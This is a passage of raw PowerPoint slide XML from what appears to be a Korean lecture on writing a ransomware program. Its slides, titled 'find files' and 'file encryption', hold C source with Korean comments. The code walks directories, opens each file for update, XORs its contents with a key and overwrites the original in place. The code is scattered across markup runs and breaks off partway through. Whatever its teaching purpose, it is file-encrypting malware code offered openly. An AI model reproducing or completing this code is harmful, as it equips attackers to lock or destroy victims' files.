              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4108174" y="1097407"/>
            <a:ext cx="7924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char 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[1000];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ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일이름을 저장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 err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sprintf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, "%s/%s", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filepath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, filename);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ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일이름을 출력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char data[1024];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ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>데이터를 저장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char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the_key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[1024];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unsigned int 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i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; 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long </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>frpos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</a:rPr>
              <a:t>fwpos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="15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FILE *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fopen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, "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r+b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>");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ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일오픈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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if 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 == NULL)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if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(filename, ".") == 0)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findfile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filefullname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="15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return -1;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}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   while (!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>feof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{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fwpos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ftell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(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en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ftell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>은 현재위치의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>위치값을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 리턴</a:t>
            </a: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 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(data, 1, 1024, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>오픈된</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 파일의 자료</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>문서내용</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>을 읽고 그 사이즈를 저장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</a:rPr>
              <a:t>if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>read_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> == 0)break; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>아무것도 없는 문서이면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050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191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026" y="266410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랜섬웨어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프로그램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-#1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암호화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78FD6-ED55-49DC-B947-A9E6D3E5E21F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4108174" y="266411"/>
            <a:ext cx="616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#1 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파일 찾기 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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400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파일 암호화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3C66-495C-4BFB-BA61-9DAB1758A39D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3988904" y="681908"/>
            <a:ext cx="8203096" cy="615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0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> for (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = 0; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>read_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>++)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ko-KR" altLang="en-US" sz="1460" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>문서가 있으면</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="146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         data[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>] ^= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the_key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> % 10];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ko-KR" altLang="en-US" sz="1460" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>암호화된 데이터를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1460" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>배열에 저장</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>frpos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ftell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);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en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ftell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1460" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>은 현재위치의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>위치값을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1460" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 리턴</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1460" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fseek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fwpos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, SEEK_SET);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en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fseek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1460" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>현재의 위치로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일포인터</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1460" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 지정</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(data, 1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>read_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1460" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>배열에 저장된 값을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1460" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>함</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fseek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>frpos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, SEEK_SET);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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fclose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="146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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("%s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>암호화 완료</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.\n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filefullname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="146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   return 1;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void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>findfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(char* path) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   long </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>h_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="146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   char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>search_Path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1460" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[100];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ko-KR" altLang="en-US" sz="1460" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일경로 저장배열</a:t>
            </a:r>
          </a:p>
          <a:p>
